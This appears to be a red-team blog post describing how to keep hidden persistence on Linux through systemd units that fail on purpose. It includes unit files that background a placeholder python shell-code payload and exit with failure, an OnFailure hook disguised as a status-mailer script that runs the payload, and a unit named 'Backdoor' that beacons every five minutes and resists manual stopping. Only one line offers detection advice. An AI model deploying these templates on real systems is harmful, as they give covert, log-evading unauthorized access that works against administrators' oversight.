Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red-teaming and competitions/events. However, over the years administrators have become more accustom to systemd and how to work with its units. As a result these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expect systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, its much harder to detect a service with a common name that isn’t actually running when someone looks a a list of running services. It is also possible to hide activities from logging and other monitoring tools as well. Its also possible to utilize the StartLimit* options within a systemd unit, like a service, to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method we can simply have the service execute and background a given command, then exit 1/false. The result is a failed start and effectively result in the shell code running as a background zombie process. Bellow is a example of a service is very similar to the last systemd blog post.

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The benefits are pretty simple, the service wont show when current running services are queried. Information about the process and the command run will be within the service logs. This could lead to quick discovery, if the logs and/or service errors are reviewed by an administrator. So overall I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units –failed’ to review what’s going on with the system.

Method B: Expect failure and trigger OnFailure Unit

This method utilizes a legitimate service unit file from a common program, that’s not actually currently installed. Since the started services intended binaries and configuration files don’t actually exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit similar to this systemd-unit-status-mailer example. The idea being, we can hide our activity within another unit to leverage controlled failure to maintain persistence. An example for this method consists of the following.

Frist we can modify an existing unit or copy a new one from a common package and add OnFailure option to trigger the secondary unit.

 [Unit]
...
OnFailure=unit-status-mail@%n.service

Next we can utilize a legitimate looking secondary unit like the common unit status mailer to just execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally we could add shellcode directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status $UNIT)

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is the malicious process is nested within execution of a secondary systemd unit, which only triggers on failure. This means that the execution isn’t within the purview of systemd itself and therefore will not show up within standard logs.

Leveraging Start Limits for effective Beaconing

There are several options available to control how and when systemd will take an action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, we can create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5 minute beacon can be done like the following example.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The option ‘RefuseManualStop=True’ can be used to prevent users from being able to manually stop a given service unit.